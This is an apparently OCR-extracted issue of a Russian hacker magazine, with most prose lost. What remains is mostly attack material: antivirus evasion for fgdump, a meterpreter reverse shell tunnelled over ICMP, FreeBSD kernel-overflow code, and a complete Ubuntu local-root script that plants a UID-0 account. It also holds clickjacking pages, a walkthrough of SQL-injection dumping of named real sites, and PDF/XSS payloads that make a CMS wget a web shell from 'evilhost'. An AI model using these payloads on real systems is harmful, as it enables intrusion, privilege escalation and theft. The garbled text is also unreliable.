, , , . owasp.
org/index.php/Category:OWASP_WebScarab_NG_Project.

GPU/CPU. golubev.com.
.
Ighashgpu MD4, MD5 SHA1 ( );
igrargpu RAR-, MS/OpenOffice/WinZip
.

, . ,
: / , , salt, ..

CPU GPU (golubev.com/about_cpu_
and_gpu_ru.htm),
.

043

:
( )
, . .

.
, .
Resource Hacker. angusj.com/
resourcehacker/. 2002 ,
:). , fgdump (foofus.net/~fizzgig/fgdump/
downloads.htm). , (Tool For
Mass Password Auditing :)).
virustotal.com. ,
, (38/41).
.
, fgdump
, 30 41
(fgdump_2.exe). , ... Resource Hacker:
1. Resource Hacker(RH), , (c:\
windows\system32\notepad.exe).
2. .
3. Version Info
fgdump.
4. RH c fgdump CompileScript.
5. fgdump.

VersionInfo Resource Hacker

,
. :
1. RH c : Action - Save All Resources.
2. RH c fgdump: Action - Add a new Resource .
3. Resource Name 1, Resource Language 1049.
4. fgdump.

virustotal.com. 23 41
(fgdump_5.exe).
, ,
. ,
. ,
.

:
WINDOWS (ASLR/DEP)

:
Windows-
. , . , Windows
. , DEP XP SP2,
, SEH' Vista, . -, ,
MS. ,

044

VirusTotal.com fgdump
, , , virustotal
, .
, , ,
virustotal, fgdump. .

- MS. ,
, . , DEP ROP- (. ][), ,
ASLR. -
ASLR,
DEP. . ,
. . ,
( , , -
- :)) ,
Alin Rad Pop Secunia (secunia.com) ,
( ) DEP, ASLR, . secunia.
com/gfx/pdf/DEP_ASLR_2010_paper.pdf.
X 09 /140/ 10

: , ICMP(PING)-

default.asp). , (
, ) TCP Data ICMP-. , . ,
, TCP , ICMP .

ICMP- ()
, - . , : ,
NAT ( IP, ).
, . ,
: HTTP/HTTPS,
. -,
. , , TCP/UDP- ,
, ICMP ( -
). - :). :
ICMP-
( , NAT). , ICMP
(. Internet Control Message Protocol, RFC 792, 950) ,
, .
,
(IP) (TCP/UDP) OSI. , ,
ping. , - ,
ICMP- 8, ICMP-
0.
: IP-,
4 . Type Code 8 , 16
, 32 .
Data -, .
64 .
. , ICMP
,
(, , TCP).
.
, ICMP, , , -. ptunnel, itun, ishell, x-proxy (xakep.ru/post/16337/
X 09 /140/ 10

.
, , ptunnel(cs.uit.no/~daniels/
PingTunnel). ,
Windows ( ).
. Ishell. ,
ICMP. .
, , icmpshell.sourceforge.net.
make .
(192.168.0.1) :
./ishd

:
./ish 192.168.0.1

. , ,
ICMP-. , , . :
Win, ,
NAT. ,
backconnect.
ptunnel (by Daniel Stoedle).
,
ICMP. (ICMP-)
- ,
ICMP.
TCP . - :).
-: meterpreter
Metasploit(MSF) ICMP-. ptunnel
, , Win WinPCAP
(winpcap.org/install/default.htm). , , IP 192.168.146.1, 192.168.146.128.
meterpreter 5678 exe-,

045

meterpreter ICMP-
( MSF , ):
msfpayload windows/meterpreter/reverse_tcp
LHOST=127.0.0.1,LPORT=5678 X > reverseMP2.exe

() ICMP-:
ptunnel

(5678 ) meterpreter:
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/
reverse_tcp LHOST=127.0.0.1 LPORT=5678 E

ICMP- :
ptunnel.exe -p 192.168.146.128 -lp 5678 -da 192.168.146.128
-dp 5678

:
-p , ICMP-;
-lp ,
TCP ( meterpreter);

046

-da -dp IP , ptunnel.


ptunnel ,
, MD5.
reverseMP2.exe
meterpreter ICMP. !
. ptunnel- 5678
, ptunnel,
MSF. meterpreter, ,
ptunnel- (127.0.0.1). , -, .
(
Win NAT ICMP), ... , ,
exe exe IExpress,
. , , ,
. ! meterpreter,
.
, ( ICMP)
,
, raw .
.
ICMP-, . ,
:). z
X 09 /140/ 10


, Digital Security a.sintsov@dsec.ru


, , . : get root *nix
. LNK
. , , ,
2.

01

FREEBSD

TARGETS
FreeBSD 7.2
FreeBSD 7.3
FreeBSD 8.0 (DoS)

CVE
CVE-2010-2020

BRIEF
FreeBSD.
, . ,
,
. Census
Labs (Patroklos Argyroudis),
*nix-.
nfs_mount(), NFS.
API- mount() nmount(). ,
root.

EXPLOIT
,
exploit-db.com.
char *ptr;
long *lptr;
struct nfs_args na;
struct iovec iov[6];

memset(na.fh, 0x41, BUFSIZE);


na.fhsize = BUFSIZE;

,
.
.
ptr = (char *)na.fh;
lptr = (long *)(na.fh + BUFSIZE - 8);
*lptr++ = 0x12345678;
*lptr++ = (u_long)ptr;

/* saved %ebp */
/* saved %eip */

, ptr , 272 . lptr ,


, 264 . , 264 268
, EBP, 268 272
,
. EBP , EIP
ptr, .
, ,
.
.
memcpy(ptr, kernelcode, (sizeof(kernelcode) - 1));

kernelcode ,
UID 0, , root.
, , , ,
nmount(). ,
:
mkdir(DIRPATH, 0700);

na.version = 3;
na.fh = calloc(BUFSIZE, sizeof(char));


NTFS. , .
BUFFSIZE = 272 .
""=0x61
:

048

DIRPATH /tmp/nfs, /tmp


. , nmount(), ,
iovec.
, na.
iov[0].iov_base = "fstype";
iov[0].iov_len = strlen(iov[0].iov_base) + 1;
X 09 /140/ 10

FreeBSD. 0x61616161. Halt


FreeBSD. . root

iov[1].iov_base = FSNAME;
iov[1].iov_len = strlen(iov[1].iov_base)
iov[2].iov_base = "fspath";
iov[2].iov_len = strlen(iov[2].iov_base)
iov[3].iov_base = DIRPATH;
iov[3].iov_len = strlen(iov[3].iov_base)
iov[4].iov_base = "nfs_args";
iov[4].iov_len = strlen(iov[4].iov_base)
iov[5].iov_base = &na;
iov[5].iov_len = sizeof(na);

BRIEF
+ 1;
+ 1;
+ 1;
+ 1;

nmount() c :
nmount(iov, 6, 0);

, ,
, , ,
exit(). , root',
!

SOLUTION
. -, FreeBSD 8.1, , -,
, , -,
root'. ,
. ,
:
sysctl vfs.usermount

, UID=0.

02

UBUNTU

TARGETS
Ubuntu 9.10
Ubuntu 10.04 LTS

CVE
CVE-2010-0832
X 09 /140/ 10

Linux Ubuntu ,
root'.
, .
, root'.

EXPLOIT
, , SSH, . pam_motd,
motd.legal-notice ./cache.
, , ... root', ,
UID .
*nix-, ?
.cache .cache, , , /etc/shadow.
user@ubuntu1004desktop:~$ rm -rf ~/.cache
user@ubuntu1004desktop:~$ ln -s /etc/shadow ~/.cache;

SSH Ubuntu .
, /etc/shadow:
user@ubuntu1004desktop:~$ ls -l /etc/shadow
-rw-r----- 1 user user 1162 2010-07-25 12:50 /etc/shadow

, /etc/shadow, - root.
, .
.
: toor
/etc/passwd /etc/shadow toor. UID
, root'.
, .
:
#!/bin/bash
# /etc/passwd
P='toor:x:0:0:root:/root:/bin/bash'
# ... /etc/shadow
# toor
S='toor:$6$tPuRrLW7$m0BvNoYS9FEF9/Lzv6PQospujOKt
0giv.7JNGrCbWC1XdhmlbnTWLKyzHz.VZwCcEcYQU5q2DLX.
cI7NQtsNz1:14798:0:99999:7:::'

049

Ubuntu. 1

echo "[*] Ubuntu PAM MOTD local root"


#
[ -z "$(which ssh)" ] && echo "[-] ssh is a requirement"
&& exit 1
[ -z "$(which ssh-keygen)" ] && echo "[-] ssh-keygen is a
requirement" && exit 1
[ -z "$(ps -u root |grep sshd)" ] && echo "[-] a running
sshd is a requirement" && exit 1
#
backup() {
[ -e "$1" ] && [ -e "$1".bak ] && rm -rf "$1".bak
[ -e "$1" ] || return 0
mv "$1"{,.bak} || return 1
echo "[*] Backuped $1"
}
#
restore() {
[ -e "$1" ] && rm -rf "$1"
[ -e "$1".bak ] || return 0
mv "$1"{.bak,} || return 1
echo "[*] Restored $1"
}
# SSH-
key_create() {
backup ~/.ssh/authorized_keys
ssh-keygen -q -t rsa -N '' -C 'pam' -f "$KEY" || return 1
[ ! -d ~/.ssh ] && { mkdir ~/.ssh || return 1; }
#
mv "$KEY.pub" ~/.ssh/authorized_keys || return 1
echo "[*] SSH key set up"
}
#
key_remove() {
rm -f "$KEY"
restore ~/.ssh/authorized_keys
echo "[*] SSH key removed"
}
#
own() {
[ -e ~/.cache ] && rm -rf ~/.cache
#
ln -s "$1" ~/.cache || return 1
echo "[*] spawn ssh"
# , SSH-

050

Ubuntu. 2. /etc/shadow

ssh -o 'NoHostAuthenticationForLocalhost yes' -i


"$KEY" localhost true
[ -w "$1" ] || { echo "[-] Own $1 failed"; restore
~/.cache; bye; }
echo "[+] owned: $1"
}
bye() {
key_remove
exit 1
}
# :
KEY="$(mktemp -u)"
# , SSH
key_create || { echo "[-] Failed to setup SSH key"; exit
1; }
# C .cache
backup ~/.cache || { echo "[-] Failed to backup
~/.cache"; bye; }
# /etc/passwd
own /etc/passwd && echo "$P" >> /etc/passwd
# /etc/shadow
own /etc/shadow && echo "$S" >> /etc/shadow
# .cache
restore ~/.cache || { echo "[-] Failed to restore
~/.cache"; bye; }
# SSH,
key_remove
echo "[+] Success! Use password toor to get root"
#
#
# toor
# =toor
su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown
root: /etc/{passwd,shadow}; chgrp shadow /etc/shadow;
nscd -i passwd >/dev/null 2>&1; bash" toor

SOLUTION
, :
user@ubuntu1004desktop:~$ sudo aptitude -y update
X 09 /140/ 10

LNK. PoC

Ubuntu. , root

user@ubuntu1004desktop:~$ sudo aptitude -y install


libpam~n~i

03


.LNK-

TARGETS
Windows XP
Windows 2000/2003/2008
Windows Vista
Windows 7

CVE
CVE-2010-2568

BRIEF
0day ,
Win32/Stuxnet, (
). . , -
DLL- - DLL ...

EXPLOIT
,
.LNK ?
,
. (explorer.exe
shell32.dll) . , .LNK
(.cpl),
LoadLibraryW()
.CPL-. ,
.CPL-, , , .DLL. ,
, LoadLibraryW() DllMain(). , . , , . ,
.
, .LNK , ,
, autorun.inf. PoC
, ,
DbgView. : SUCKM3 FROM
EXPLORER.EXE MOTH4FUCKA #@!. - , ,
X 09 /140/ 10

... , MetaSploit . pwn ,


,
.
WebDav,
HTTP. , WebDav- , , IE,

(explorer.exe).
. ,
.lnk, ... ,
, .DLL-,
.

SOLUTION
, ,
, . (Didier Stevens)
. -,
Ariad [],
/ CD-ROM USB-. -,
(SRP).
.

, .
, .
.
, .
.
, .exe,
.
, .

04


SAFARI

TARGETS
Safari 4
Safari 5

CVE
N/A

BRIEF
*nix Windows, .
(Jeremiah Grossman), ,

051

Clickjacking.

LNK. Metasploit

, . , ,
, - ,
, ,
- :).

EXPLOIT
?
, , , , editbox.
Safari
, ( ?).
!
, ID, . ! ,
? , -,
. :
, ,
, .
, , , , . -
, . :
<html>
<head>
<meta http-equiv="Content-Type" content="text/
html; charset=utf-8" />
<title>
Settings - Profile - brightkite.com
</title>
</head>
<body>
<form action="http://localhost/" method="get">
<label for="fullname">Full name</label>
<input id="fullname" name="fullname" />
<input type="submit" />
<input id="street" name="street"
style="opacity:0"/>
<input id="e-mail" name="e-mail"
style="opacity:0"/>
</form>
</body>
</html>

052
52

, .
, .
( GET).

SOLUTION
Apple , , ,
, .
.

05

CLICKJACKING

TARGETS
Firefox 3.6.7
Netscape 9.0.0.6
Opera 10.60
Safari 4.0.2
SeaMonkey 2.0.6

CVE
N/A

BRIEF
, Clickjacking.
, ,
, .
Securitylab.ir (Pouya
Daneshmand)
. Clickjacking?
, - .
, (
).

EXPLOIT
HTML-.
, ,
.
. ,
. .
FireFox,
. HTML:
<html><head>
<meta http-equiv="content-type" content="text/html;
charset=UTF-8">
X 09 /140/ 10

Clickjacking.
SeaMonkey 2.0.6 Clickjacking Vulnerability</font></h1>
<p> </p>
<div style="border-top-style: solid; border-top-width:
1px; padding-top: 1px">
<b><br><br>

Autofill.
<title>FF3.6.7/SM 2.0.6 ClickJacking Vulnerability</
title>
</head><body>
<div id="mydiv" onmouseover="document.location='http://
www.mozilla.org';" style="border: 0px none ; background:
rgb(0, 0, 0) none repeat scroll 0% 0%; position:
absolute; width: 2px; height: 2px; -moz-background-clip:
-moz-initial; -moz-background-origin: -moz-initial;
-moz-background-inline-policy: -moz-initial;"></div>
<script>
function clickjack_armor(evt)
{
clickjack_mouseX=evt.pageX?evt.pageX:evt.clientX;
clickjack_mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.
left=clickjack_mouseX-1;
document.getElementById('mydiv').style.
top=clickjack_mouseY-1;
}
</script>
<center>
<br>
<center><h1><font face="Calibri">Firefox 3.6.7 /
X 09 /140/ 10

<a href="http://www.Securitylab.ir"
onclick="clickjack_armor(event)"> Go
to the http://www.Securitylab.ir : (http://www.
mozilla.org)</a></b></div>
<div style="border-bottom-style: solid; border-bottomwidth: 1px; padding-bottom: 1px">
<p> </div>
<p> </p>
</center>
<div style="border-top-style: solid; border-top-width:
1px; border-bottom-style: solid; border-bottom-width:
1px; padding-top: 1px; padding-bottom: 1px">
<b><font face="Calibri">Pouya Daneshmand,
Securitylab.ir</font></b></div>
</center></body></html>

mydiv.
, ,
,
. ,
clickjack_armor().
. clickjack_
armor() mydiv ,
onmouseover
. ,
, . .
, , , , , .

SOLUTION
. ,
, , , . z

053


Digital Security a.sintsov@dsec.ru

Windows
Stuxnet

. ,
.

, ,
. ,
.
. , CC, , , .

SCADA, Supervisory Control And Data
Acquisition,
(- ). , ,
, .. ,
, ,
, .
, Stuxnet.

054

STUXNET

- , VirusBlokAda. 17
, 10
- ( , , ,
). Microsoft
Realtek. VirusBlokAda
0day- (.lnk),
Microsoft ( ). Realtek? ,
, Verisign Realtek.


(HIPS, ), ,
. ,
X 09 /140/ 10

Siemens
SCADA
Symantec
, , .
, - ,
, , ,
.

, , - USB-. autorun.inf .
,
.DLL-, , . ,
.DLL- (,
, , .TMP) .LNK-.
.LNK .
.
Total Commander .DLL-
! ? ,

. , .DLL- .
HEX-, ,
.DLL. ,
, ! -
. .CPL. CPL , , .DLL,
, ,
.DLL. , .DLL,
. ,
, . , ,
LoadLibraryW().
,
DllMain()
. ,
.CPL-,
( DllMain()),
. , .PIF-.


, ,
X 09 /140/ 10

CC. . .LNK
~wtr4141.tmp,
. , ( 25 ).
Symantec,
, .
0day-, ,
, ~wtr4141.tmp,
kernel32.
dll. :
FindFirstFileW
FindNextFileW
FindFirstFileExW

ntdll.dll:
NtQueryDirectoryFile
ZwQueryDirectoryFile


~wtr .tmp (
.lnk),
, , . ,
.
. ~wtr4141.tmp
(~wtr4132.tmp). ,
, ntdll.dll
:

ZwMapViewOfSection
ZwCreateSection
ZwOpenFile
ZwCloseFile
ZwQueryAttributesFile
ZwQuerySection

LoadLibrary
,

055


mypremierfutbol.com
todaysfutbol.com

Symantec

,
~wtr4132.tmp, , , ( UPX). ,
,
( API ).
mrxcls.sys
mrxnet.sys ( - Stuxnet). ,
,
.
~wtr4141.tmp.
, , Realtek, (
).
~wtr4141.tmp USB-. ,
.SYS- (HKEY_LOCAL_MACHINE\SYSTEM\
ControlSet001\Services\MRxCls). .DLL, SCADA
Siemens Step 7.
, SCADA . ,
.DLL (
). ,
(MSSQL). , WinCCConnect 2WSXcder. SCADA Siemens
Simatic WinCC. ,
Siemens. , . ,

. ,
. :

056

- . Symantec .
,
XOR 31- ,
.DLL-. XOR-,
, .

( , , ,
SCADA).
RPC , , .

?! , . SCADA .
. ( ), ,
( , ).
, .DLL SCADA.
?
? ,
, ,
,
( )!
,
( ? :)).


. Symantec
.

SCADA. , ( ). ,
...

, ,
SCADA. , , ,
.
,
ERP-,
X 09 /140/ 10

virustotal .LNK-
( Java-)
. ERP- , , .., ..
( , ERP
, SCADA ,
...). - (
aka sh2kerr). .LNK-,
, , Zeus
. , Rapid7 Metasploit, HTTP
WebDav.
.DLL-, . ,
,
, ,
. DLL ,
, , ,
. PoC
(suckme.lnk_, )
virustotal.com. 27 ,
.
,
Java. :
opy Java.lnk Java.lnk_
X 09 /140/ 10

virustotal PoC

.
HEX-.
Unicode-, Java- .
CPL-, Java
Unicode-. CPL (DLL) ,
(fa ff ff ff 20) .
.LNK. virustotal.com.
Unicode- 11 , Java-
8, 70% ,
, Symantec, Kaspersky, AVG,
NOD32. . ...
, , ,
,
,
. , : AdBlokAda
( ), Symantec ( ), ESET
.
,
:).
, , . z

057


Cr@wler crawler@xakep.ru

! SQL-,
, .
, , , ,
, .
! ,
.
?
, ,
.
. ,
-. ,
. ,
, ,
, ,
:). .
, , ,

058

.
,
,
- , .
, ,
,
,
, ,
. ,
.
X 09 /140/ 10


:)

my-symbian.com . Pangolin

(
, , , , , , e-mail - ),
.
. , ,
ICQ- ,

.
, ICQ- PHP-,
(,
PHP, ),
,
.
. , , .
, , , ,
,
, , ( ) .

-. ? - poker .php?=.
.
2) Domain Selection ,
. ,
(, , ),
.mil.
3) Max Url Threads , , ,
.
5 100, ,
. ,
, TCPIP.SYS
.
4) Max Url Threads ,
. Sqli
Error Based .
Scan Sites,
.
30-40 .
.
, ;
Test Sites.
, . , , ,
.

, .
, ,
( ),
.
.
REILUKE! Exploit Scanner. (
, ) SQL , XSS, LFI, RFI,
( -).
,
, ,
Scan
Sites:
1) Dork .
: .php?catid=, .php?uid=, .aspx?item=
. , .
:
, ,
, . ,
dork , , online RPG, ,
,
X 09 /140/ 10

, ,
15-20 . ?
.
, ,
. ,
( , ,
), ,
Pangolin professinal
Edition SqliHelper (,
DVD).
, , . SqliHelper, http://www.cwdma.ca/lang/
en/profile.php?userID=86 (,
, ,

059


Reiluke! ExploitScanner

),
(
. ,
,
:)). , . userID
,
Error: You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line
6

.
SqliHelper. , Target
REILUKE! Exploit Scanner ,
Inject. , ,
, : Mysql
version 5 OK - Please Get Database. Get Database,
Database Name
: information schema, CWDMA, EBCTest. ,
, ,
Get Tables.
. , Users, Company,
Address1, Address2, City, Province, Country, Phone
. , ,
,
Get Columns. ,
Dump Now. , , ,
-, -
:).
, ,
, ,
, IP- (,
, , VPN
; Forum Proxy Leecher,
TOR).

, ,
: REILUKE! Exploit Scanner,

060

10-15 ,
Pangolin
SqliHelper. ,
,.
, ,
. ,
, . , , ,
.
,
, .
,
NetDevilz Scanner ( - ,
). http://my-symbian.com/
uiq/software/category.php?fldAuto=6. , Pangolin, URL
,
Play. Data,
Tables. ,
, , b2users. ,
Columns. ! ,
IP-, ICQ . , , .
, ,
.
- :
,
Datas. ,
, ,
: !
, . ? shop.my-symbian.com.


. REILUKE! Login Finder
. ,
-. - !
,
, ROBOTS.TXT, ,
, X 09 /140/ 10

242shop.ch . :)
. .
: site:my-symbian.com
intext:login.
.

... !

,
. ,
. , , ,
. , ,
, , :). , ,
. ,
-,
.
, ? Exploit
Scanner, nike adidas vans php?id=
, . - facebook.com,
. , 242shop.ch/shoes_details.php?id=162,
.
SQLiHelper.
242shopch, 242shopch1, 242shopch2.
wp_users, , ,
, , :
admin:$P$B5LgS3enL1rifx5pe****a8QA61AZi1:admin:***@24
2shop.ch

, . , - , X 09 /140/ 10

Login Finder

,
. , :).

, -
,
.
.
. ! z

061


artembaranovex@gmail.com


Windows 7

, !
. ,
PEB.
, ,
, .
.
.

, Windows
. ,
( #PF).
( VMM)
( ,
, )
, , .
VMM
(Virtual Address Descriptor),
.

062

VAD
. windbg. VAD , , ,
(, PEB).
VAD
dll,
Digital Investigation The VAD tree: A process-eye view of physical
memory (dfrws.org/2007/proceedings/p62-dolan-gavitt.pdf).
VAD, , ,
.
X 09 /140/ 10

!process
Vad
, , VAD
DLL.

VAD,

, VAD ,
. , VirtualAlloc MEM_RESERVE
VAD, .
MEM_COMMIT
. :
DLL , ,
, VAD,
. , ,
VAD .
MiCheckVirtualAddress,
, PTE.
VAD.
:
MiCheckVirtualAddress (
IN PVOID VirtualAddress,
OUT PVOID Unknown,
OUT PMMVAD *VadOut
)

VAD

VAD : _MMVAD_SHORT, _MMVAD _MMVAD_


LONG. . (. _MMADDRESS_
NODE):
typedef struct _MMVAD_SHORT
{
union
{
LONG32 Balance : 2;
struct _MMVAD* Parent; // VAD
} u1;
struct _MMVAD* LeftChild; // VAD
struct _MMVAD* RightChild; // VAD
ULONG32 StartingVpn; //
ULONG32 EndingVpn; // ,
union
{
ULONG32 LongFlags;
struct _MMVAD_FLAGS VadFlags; //
} u;

} MMVAD_SHORT, *PMMVAD_SHORT.

X 09 /140/ 10

typedef struct _MMVAD_FLAGS


{
ULONG32 CommitCharge : 19;
ULONG32 NoChange : 1;
ULONG32 VadType : 3;
ULONG32 MemCommit : 1;
ULONG32 Protection : 5;
ULONG32 Spare : 2;
ULONG32 PrivateMemory : 1;
}MMVAD_FLAGS, *PMMVAD_FLAGS;

//
//
//
//
//
//
//

0 BitPosition
19 BitPosition
20 BitPosition
23 BitPosition
24 BitPosition
29 BitPosition
31 BitPosition

CommitCharge (COMMIT) .
VadType Vad.
Protection .
MMVAD_SHORT , , ,
, VitualAlloc. _MMVAD ,
.
typedef struct _MMVAD
{
union
{
LONG32 Balance : 2;
struct _MMVAD* Parent;
} u1;
struct _MMVAD* LeftChild;
struct _MMVAD* RightChild;
ULONG32
StartingVpn;
ULONG32
EndingVpn;
union
{
ULONG32 LongFlags;
struct _MMVAD_FLAGS VadFlags;
}u;

// , VAD
union
{
struct _SUBSECTION* Subsection;
struct _MSUBSECTION* MappedSubsection;
};
struct _MMPTE* FirstPrototypePte;
struct _MMPTE* LastContiguousPte;
struct _LIST_ENTRY ViewLinks;
struct _EPROCESS* VadsProcess;
} MMVAD, *PMMVAD;

.
typedef struct _SUBSECTION
{
//
PCONTROL_AREA ControlArea;
// , VMM
union
{
ULONG LongFlags;
MMSUBSECTION_FLAGS SubsectionFlags;
} u;

} SUBSECTION, *PSUBSECTION;

063

!vad

NT

VADROOT

2195 (2K)
2600 (XP)
3790 (2K3)
6000 (VISTA)
7100 (SEVEN RC)
7600 (SEVEN RTM)

0X194
0X11C
0X250
0X238
0X274
0X278

FILE_OBJECT,
.
typedef struct _CONTROL_AREA
{
PSEGMENT Segment;

struct _EX_FAST_REF FilePointer;

}CONTROL_AREA, *PCONTROL_AREA;

FileObject
FilePointer 0xFFFFFFF8.
EPROCESS VadRoot, ,
.
_VAD, Parent, ,
.
VAD .
VadRoot = *(PULONG )( (PUCHAR )Eprocess +
EPROCESS_VadRoot_Offs ) & 0xFFFFFFFC;
VadRoot EPROCESS NT. Windows 7
MM_AVL_TABLE (, ).
typedef struct _MM_AVL_TABLE {
struct _MMADDRESS_NODE BalancedRoot;
struct {
ULONG32 DepthOfTree : 5;
ULONG32 Unused : 3;
ULONG32 NumberGenericTableElements : 24;
};
VOID* NodeHint;
VOID* NodeFreeHint;

064

}MM_AVL_TABLE, *PMM_AVL_TABLE;

, BalancedRoot.
u1.Parent ,
RightChild,
, .
VAD MMVAD_SHORT
MMVAD MMVAD_LONG. ,
.
4 ( -4
). VadS
_MMVAD_SHORT, Vad _MMVAD, Vadl _MMVAD_LONG.
, , ControlArea, Subsection, FilePointer.

.
(!process 0 0) :
kd> !process 84944418 0
PROCESS 84944418 SessionId: 1 Cid: 0a40
Peb:
7ffdf000 ParentCid: 08e4
DirBase: 3ec0c420 ObjectTable: 993f0830
HandleCount: 256.
Image: TOTALCMD.EXE

:
kd> dt _MM_AVL_TABLE 84944418+278 -r2
nt!_MM_AVL_TABLE
+0x000 BalancedRoot: _MMADDRESS_NODE
+0x000 u1 : <unnamed-tag>
+0x000 Balance : 0y00
+0x000 Parent: 0x84944690
(. )
+0x004 LeftChild : (null)
+0x008 RightChild : 0x84947610
VadRoot

kd> dd 84944418+278 l1
84944690 84944690

VAD:
kd> dc 0x84947610-4 l1
X 09 /140/ 10

VadS @80e2cd88
00190000-001a0000

VadS @80e2088

VadS @ffa98178

00030000-00070000

01000000-01013000

Control Area @80d53220


Flags: Accessed,
HadUserReference,
Image, File

File Object @80e170e0


Name:
[...]\notepad.exe

VAD notepad.exe
8494760c

20646156

Vad

MMVAD.
kd> dt _MMVAD 0x84947610
nt!_MMVAD
+0x000 u1
: <unnamed-tag>
+0x004 LeftChild
: 0x84949290 _MMVAD
+0x008 RightChild
: 0x84941b48 _MMVAD
+0x00c StartingVpn
: 0x703b0
+0x010 EndingVpn
: 0x703e1
...
+0x024 Subsection
: 0x84820110 _SUBSECTION
+0x024 MappedSubsection : 0x84820110 _MSUBSECTION
+0x028 FirstPrototypePte : 0x98f1ece0 _MMPTE
+0x02c LastContiguousPte : 0xfffffffc _MMPTE
+0x030 ViewLinks
: _LIST_ENTRY [ 0x848e3618 0x84820108 ]
+0x038 VadsProcess
: 0x84944419 _EPROCESS

VAD 0x703b0000-0x703e1000 ,
0x84820110 ( ,
EXE- ).
kd> dt _subsection ControlArea 0x84820110
nt!_SUBSECTION
+0x000 ControlArea : 0x848200c0 _CONTROL_AREA
kd> dt _control_area 0x848200c0 -r1
X 09 /140/ 10

nt!_CONTROL_AREA
+0x000 Segment
...
+0x024 FilePointer
+0x000 Object
+0x000 RefCnt
+0x000 Value

: 0x98f1ecb0 _SEGMENT
: _EX_FAST_REF
: 0x88cbc79a
: 0y010
: 0x88cbc79a

, : 0x88cbc79a & 0xFFFFFFF8


= 0x88CBC798.
kd> dt _file_object filename 88CBC798
nt!_FILE_OBJECT
+0x030 FileName : _UNICODE_STRING "\Windows\
System32\winmm.dll"

, VAD winmm.dll !
, Windows 2000/XP VadRoot,
PVOID VadRoot.
VAD .
.

.
. , ,
, .
, . z

065


d0znp ONsec

0DAY- CMS

XSS- 1-,
- CC09. , ,
? , ,
WAF,
, WAF. , ,
...

,
.
, ,
, ,
. , ,
- .
,
. ,
,
.
,
CMS.
filesize
hijacking Internet Explorer. ,
(seclists.org/fulldisclosure/2010/
Apr/288). , .
, filesize - Internet Explorer 9.
SVG IMG, , , filesize SVG, XML, -

066

XML- -,
. , ,
, filesize XML 0.
, -,
.
1-, . ,
, , ,
.
Web Application Firewall
Evaluation Criteria Web Application Security
Consortium, , .
.
8.0.5 CC09, WAF,
.
9.0.3, , , -.
, .

, .
X 09 /140/ 10

XSS [URL]
BB-,
,
. , BB HTML-, ,
, , , . ,
HTML-. ,
XSS.
XSS :
[URL=a' attribute='blabla']XSS[/URL]


.
, ,
WAF, onload, style, onmouseover
.

,
,
. ,
,
WAF. , .
,
,
.
, ,
sessid,
WAF.
SQL PHP-, WAF,
. ! PHP-
, , , CSRF,
-! ,
WAF, XSS+CSRF+WAF by pass
-. :).

PDF

,
WAF.
.

. . , ,
X 09 /140/ 10

HTML injection ICQ


PDF-.
, .
, ...

Adobe Acrobat
. - , ( , ) ,
PDF JavaScript.
, cookies, , JavaScript.
:
PDF GET- POST- ,
CSRF , , -, . WAF
PDF- .

.

WARNING
warning

,

.

PDF CSRF EXPLOIT

PDF CSRF
.
- -. , PDF-
.
. -, PDF JavaScript
, HTTP- . -, Adobe Acrobat
,
.
,
, . , JavaScript PDF- FormCalc. Google
: help.adobe.com/en_US/
livecycle/es/FormCalc.pdf. , , , , URL functions. Get, Post, Put.
PDF-,
:
1. GET-
targethost:6448/bitrix/admin/user_admin.php?lang=ru.
2. , sessid.
3. POST- sessid wget http://
evilhost.ru/s.txt -O shell.php targethost: 6448/
bitrix/admin/php_command_line.php?mode=frame&lang=ru.
FormCalc
:

INFO

info

,
PDF,

Adobe Acrobat. ,




CSRF.
PDF

!

067

HTTP
PDF.
, PDF
XSS, SecurityLab.Ru
var a = Get("http://targethost:6448/bitrix/admin/
user_admin.php?lang=ru")
var sessid = (Substr(a,At(a,"sessid=")+7,32))
Post("http://targethost:6448/bitrix/admin/php_command_
line.php?mode=frame&lang=ru",Concat("sessid=",sessi
d,"&query=system%28%27wget http://evilhost:6448/s.
txt O shell.php%27%29%3B"),"application/x-www-formurlencoded")

PDF- Adobe Livecycle Designer (adobe.com/go/trylivecycle),


3 . PDF
- .
PDF
iText (itextpdf.com) Java.
:
public static void replacePDFScript(
String filename, String script)
{
try
{
PdfReader reader = new PdfReader(filename);
XfaForm xfa = new XfaForm(reader);
Document doc = xfa.getDomDocument();
NodeList list = doc.getElementsByTagName("script");
list.item(0).setTextContent(script);
PdfStamper stamper = new PdfStamper(reader,
new FileOutputStream(filename+"_mod.pdf"));
xfa.setDomDocument(doc);
xfa.setChanged(true);
XfaForm.setXfa(xfa, stamper.getReader(),
stamper.getWriter());
stamper.close();
}
catch (Exception e) {
e.printStackTrace();
}
}

, , 3 . , Adobe Acrobat . PDF, , ActiveX-


Adobe Acrobat ,
Acrobat. , PDF-,
.
, . , , ,

068

. , , , ,
. ,
, ,
!
. , PoC- .
,
, PDF.
,
. ,
, . http://targethost:6448/bitrix/admin/shell.php.
CSRF,
. , , , CSRF.
HTTP-,
.

, WAF!

CSRF PDF XSS.


,
(.
XSS).
, . , 09,
. , , XSS
HTML. 15
InternetExplorer onmouseenter
onmouseleave. WAF onmouseover,
onmouseout. , :). , ...
onselectstart, IE,
Chrome. Chrome
, IE , .
CSRF
, -, -. , , ,
advisory ,
.


. advisory . CSRF via
PDF, XSS [URL] WAF.
(XSS+WAF
X 09 /140/ 10

HTTP://WWW
links

bypass). , WAF ,
, ,
JavaScript, . , ,
jjencode.
- , URL,
, . ,
jjencode .
.
:
1. iframe, form, input (
POST sessid query).
2. iframe -
innerHTML.
3. innerHTML iframe sessid.
4. sessid value
input.
5. form.submit.
, , onload. ,
i[onload]=a, ,
-, . .
, setTimeout(a,10000).
, iframe
10 , a sessid.
. :
[URL=http://a' onmouseenter='var i=document.
createElement("iframe");i.style.
width="0px";i.style.height="0px";var p=/
sessid=.{32}/;var t="";var f=document.
createElement("form");f.method="POST";f.
action="/bitrix/admin/php_command_
line.php?mode=frame";var s=document.
createElement("INPUT");s.style.
visibility="hidden";s.type="text";s.
name="sessid";var y=document.
createElement("INPUT");y.style.
visibility="hidden";y.type="text";y.
name="query";y.value="system(\"wget
htt\".\"p://evilhost:6448/s.txt
-O s.php\");";f.appendChild(s);f.
appendChild(y);function b(){t+=i.
document.body.innerHTML.match(p);s.
value=t.substr(7);f.submit()};i.
src="/bitrix/admin/";document.body.
